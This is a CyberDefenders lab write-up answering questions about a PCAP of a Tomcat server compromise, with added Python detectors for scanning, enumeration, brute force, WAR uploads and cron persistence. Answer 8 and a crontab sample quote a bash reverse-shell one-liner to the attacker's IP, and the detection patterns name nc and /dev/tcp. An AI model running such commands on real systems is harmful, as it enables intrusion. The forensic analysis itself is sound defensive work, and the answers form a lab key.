Tomcat Takeover Lab
CyberDefenders Network Forensics Lab

Scenario
The SOC team has identified suspicious activity on a web server within the company’s intranet. To better understand the situation, they have captured network traffic for analysis. The PCAP file may contain evidence of malicious activities that led to the compromise of the Apache Tomcat web server. Your task is to analyze the PCAP file to understand the scope of the attack.
Question 1
Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
Answer 1
Looking deeper into the PCAP file, it was clear that the IP address 14.0.0.120 was responsible for the scanning behavior. It was probing different ports from its own local port, 51985, to see whether it could get a response.

Question 2
Based on the identified IP address associated with the attacker, can you identify the country from which the attacker’s activities originated?
Answer 2
A quick lookup of the IP address indicated that the attacker was located in China.

Question 3
From the PCAP file, multiple open ports were detected as a result of the attacker’s active scan. Which of these ports provides access to the web server admin panel?
Answer 3
Looking toward the end of the port scan revealed an HTTP request made to port 8080.
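The scanning pattern described in Answers 1 and 3 can be pulled out of packet summaries programmatically rather than by scrolling through Wireshark. The following Python is an added example, not part of this write-up or of the lab: it treats a list of (timestamp, source, source port, destination, destination port, TCP flags) tuples as a stand-in for a tshark field export, flags any source whose SYNs reach many distinct ports within a short window, and lists which of those ports answered with SYN/ACK (open). The packet list is constructed to echo the write-up's findings (scanner 14.0.0.120 probing from port 51985, port 8080 open); the server address 10.0.0.112, the second open port and the other port numbers are placeholders.

```python
"""Port-scan triage over TCP packet summaries (added example, not lab data)."""
from collections import defaultdict

SCANNER = "14.0.0.120"   # source identified in the write-up
SERVER = "10.0.0.112"    # constructed placeholder for the Tomcat host
PROBED = [21, 22, 23, 25, 80, 110, 443, 445, 3306, 8080, 8443]  # constructed
OPEN = {22, 8080}        # constructed: 8080 matches the write-up, 22 is illustrative


def build_sample():
    """Constructed packet list: one SYN per probed port from the scanner,
    a SYN/ACK back for open ports and RST/ACK for closed ones, plus one
    benign client that only opens a single connection to the web app."""
    pkts = []
    t = 0.0
    for port in PROBED:
        pkts.append((t, SCANNER, 51985, SERVER, port, "S"))
        reply = "SA" if port in OPEN else "RA"
        pkts.append((t + 0.001, SERVER, port, SCANNER, 51985, reply))
        t += 0.01
    pkts.append((t + 5.0, "10.0.0.5", 40211, SERVER, 8080, "S"))
    pkts.append((t + 5.001, SERVER, 8080, "10.0.0.5", 40211, "SA"))
    return pkts


def find_scanners(packets, min_ports=10, window=60.0):
    """Return {src_ip: distinct_port_count} for sources whose bare SYNs hit
    at least `min_ports` distinct destination ports within `window` seconds."""
    syns = defaultdict(list)                      # src_ip -> [(ts, dst_port)]
    for ts, src, _sport, _dst, dport, flags in packets:
        if flags == "S":
            syns[src].append((ts, dport))
    result = {}
    for src, events in syns.items():
        events.sort()
        seen = defaultdict(int)                   # dst_port -> count in window
        best = start = 0
        for ts, dport in events:                  # sliding time window
            seen[dport] += 1
            while ts - events[start][0] > window:
                old_port = events[start][1]
                seen[old_port] -= 1
                if seen[old_port] == 0:
                    del seen[old_port]
                start += 1
            best = max(best, len(seen))
        if best >= min_ports:
            result[src] = best
    return result


def open_ports(packets, scanner_ip):
    """Ports on which the scanner's SYN was answered with SYN/ACK."""
    probed, answered = set(), set()
    for _ts, src, sport, dst, dport, flags in packets:
        if src == scanner_ip and flags == "S":
            probed.add((dst, dport))
        elif dst == scanner_ip and flags == "SA":
            answered.add((src, sport))
    return sorted(port for _host, port in probed & answered)


if __name__ == "__main__":
    sample = build_sample()
    print("scanners:", find_scanners(sample))
    print("open ports reached by", SCANNER, ":", open_ports(sample, SCANNER))
```

The window-based count is what separates a scanner from a busy legitimate client: the benign host in the sample touches one port and is never flagged, while the scanner's eleven distinct ports in a fraction of a second trip the threshold.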

Question 4
Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
Answer 4
Looking at the various GET requests sent by the attacker, it was clear that once the web page had fully loaded, they started using gobuster to enumerate files and folders within the web directory.

Question 5
After the effort to enumerate directories on our web server, the attacker made numerous requests to identify administrative interfaces. Which specific directory related to the admin panel did the attacker uncover?
Answer 5
There were a few standard directories discovered, but the one that caught my eye, and the attacker's, was /manager.

Question 6
After accessing the admin panel, the attacker tried to brute-force the login credentials. Can you determine the correct username and password that the attacker successfully used for login?
Answer 6
After looking for an HTTP POST request coming from the attacker's IP address, it was clear that the credentials used were admin:tomcat.

Question 7
Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
Answer 7
Using the tool NetworkMiner, I was able to find a rather suspicious file close to the end of the PCAP file, after the attacker had obtained access to the system. It was named JXQOZY.war.

I also found the file within Wireshark.
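The three HTTP-layer steps in Answers 4 to 7 (directory enumeration, the brute force against /manager, and the WAR upload) can each be expressed as a small detection rule over per-request summaries. The Python below is an added example, not part of this write-up or the lab: it runs over request tuples of the kind you would export with tshark rather than over the raw PCAP, so it works offline. SAMPLE_REQUESTS is constructed to mirror the write-up's findings (gobuster requests, failed logins ending in admin:tomcat, an upload of JXQOZY.war); the individual records, the User-Agent strings, the failed credential guesses and the benign client 10.0.0.5 are placeholders, not data from the capture.

```python
"""HTTP request triage for enumeration, brute force and WAR deployment
(added example; request records are constructed, not from the lab PCAP)."""
import base64
from collections import defaultdict

ATTACKER = "14.0.0.120"   # from the write-up


def basic_auth(user, password):
    """Authorization header value a client sends for HTTP Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# One tuple per request (constructed sample):
# (src_ip, method, path, status, user_agent, authorization, upload_filename)
SAMPLE_REQUESTS = (
    [(ATTACKER, "GET", "/", 200, "Mozilla/5.0", None, None)]
    + [(ATTACKER, "GET", f"/{word}", 404, "gobuster/3.6", None, None)
       for word in ("admin", "backup", "cgi-bin", "images", "test", "uploads")]
    + [(ATTACKER, "GET", "/manager", 302, "gobuster/3.6", None, None)]
    + [(ATTACKER, "GET", "/manager/html", 401, "Mozilla/5.0", basic_auth(u, p), None)
       for u, p in (("admin", "admin"), ("admin", "password"), ("tomcat", "tomcat"))]
    + [(ATTACKER, "GET", "/manager/html", 200, "Mozilla/5.0",
        basic_auth("admin", "tomcat"), None),
       (ATTACKER, "POST", "/manager/html/upload", 200, "Mozilla/5.0",
        basic_auth("admin", "tomcat"), "JXQOZY.war"),
       ("10.0.0.5", "GET", "/index.jsp", 200, "Mozilla/5.0", None, None)]
)

# Substrings that identify common directory brute-forcing tools by User-Agent.
TOOL_AGENTS = ("gobuster", "dirb", "dirbuster", "ffuf", "feroxbuster")


def detect_enumeration(requests, min_requests=5, min_miss_ratio=0.5):
    """Per source IP, flag directory enumeration either by a known tool
    User-Agent or by many requests with a high share of 404s (the ratio
    rule still fires when a tool is configured with a browser User-Agent)."""
    per_src = defaultdict(lambda: {"requests": 0, "not_found": 0, "tools": set()})
    for src, _method, _path, status, agent, _auth, _fname in requests:
        rec = per_src[src]
        rec["requests"] += 1
        if status == 404:
            rec["not_found"] += 1
        rec["tools"].update(t for t in TOOL_AGENTS if t in agent.lower())
    flagged = {}
    for src, rec in per_src.items():
        miss_ratio = rec["not_found"] / rec["requests"]
        if rec["tools"] or (rec["requests"] >= min_requests and miss_ratio >= min_miss_ratio):
            flagged[src] = {"tools": sorted(rec["tools"]),
                            "requests": rec["requests"], "not_found": rec["not_found"]}
    return flagged


def detect_bruteforce(requests, admin_prefix="/manager"):
    """Per source IP, count rejected (401) credentialed requests to the admin
    path and decode the Basic credential that was finally accepted."""
    out = {}
    for src, _method, path, status, _agent, auth, _fname in requests:
        if not path.startswith(admin_prefix) or auth is None:
            continue
        rec = out.setdefault(src, {"failed": 0, "success": None})
        if status == 401:
            rec["failed"] += 1
        elif status == 200 and rec["success"] is None:
            scheme, _, blob = auth.partition(" ")
            if scheme == "Basic":
                rec["success"] = base64.b64decode(blob).decode(errors="replace")
    return out


def detect_war_upload(requests, admin_prefix="/manager"):
    """Deployments through the manager app: POST/PUT under the admin path
    carrying a .war file name (taken from the multipart Content-Disposition)."""
    return [(src, fname) for src, method, path, _s, _agent, _auth, fname in requests
            if method in ("POST", "PUT") and path.startswith(admin_prefix)
            and fname is not None and fname.lower().endswith(".war")]


if __name__ == "__main__":
    print("enumeration:", detect_enumeration(SAMPLE_REQUESTS))
    print("brute force:", detect_bruteforce(SAMPLE_REQUESTS))
    print("war uploads:", detect_war_upload(SAMPLE_REQUESTS))
```

The same three rules translate directly into Tomcat access-log monitoring: a burst of 404s from one client, repeated 401s on /manager/html followed by a 200, and any POST to /manager/html/upload are each worth an alert on their own, and together they are the whole intrusion in order.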

Question 8
After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
Answer 8
After looking for the reverse shell, I found the command that was run a couple of times to obtain persistence on the machine. It spawns a shell in bash:
/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
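When the persistence mechanism is a scheduled job, the text an analyst recovers from the reverse-shell stream (for instance the output of crontab -l) can be checked automatically for callback commands. The Python below is an added example, not part of this write-up or the lab: it parses crontab entries, matches each command against a few reverse-shell idioms, and extracts the callback host and port so they can be blocked and hunted for elsewhere. The command line is the one quoted in Answer 8; the cron schedule fields and the benign entries around it are constructed, since the write-up does not show the actual crontab.

```python
"""Flag reverse-shell commands in recovered crontab text (added example)."""
import re

# Constructed sample: the write-up's command plus two benign entries.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
*/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
@reboot /usr/local/bin/healthcheck.sh
"""

# (indicator name, pattern). Patterns with two groups capture host and port.
INDICATORS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/([\d.]+)/(\d+)")),
    ("interactive shell redirected to socket", re.compile(r"\bbash\s+-i\b.*?>&")),
    ("netcat with -e", re.compile(r"\bnc\b.*\s-e\s")),
]


def parse_crontab(text):
    """Yield (schedule, command) for each non-comment entry, handling both
    the five-field form and @reboot-style macros."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:          # malformed entry, nothing to run
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        yield schedule, command.strip()


def classify(command):
    """Return (matched indicator names, (host, port) or None) for a command."""
    hits, remote = [], None
    for name, pattern in INDICATORS:
        match = pattern.search(command)
        if match:
            hits.append(name)
            if pattern.groups == 2 and remote is None:
                remote = (match.group(1), int(match.group(2)))
    return hits, remote


def find_persistence(crontab_text):
    """Crontab entries whose command looks like a reverse shell."""
    findings = []
    for schedule, command in parse_crontab(crontab_text):
        hits, remote = classify(command)
        if hits:
            findings.append({"schedule": schedule, "command": command,
                             "indicators": hits, "remote": remote})
    return findings


if __name__ == "__main__":
    for f in find_persistence(SAMPLE_CRONTAB):
        print(f["schedule"], "->", f["remote"], f["indicators"])
```

The extracted host and port are what turn the finding into response actions: an egress block for 14.0.0.120:443 at the perimeter, a search of other hosts' crontabs and shell histories for the same /dev/tcp string, and removal of the entry itself.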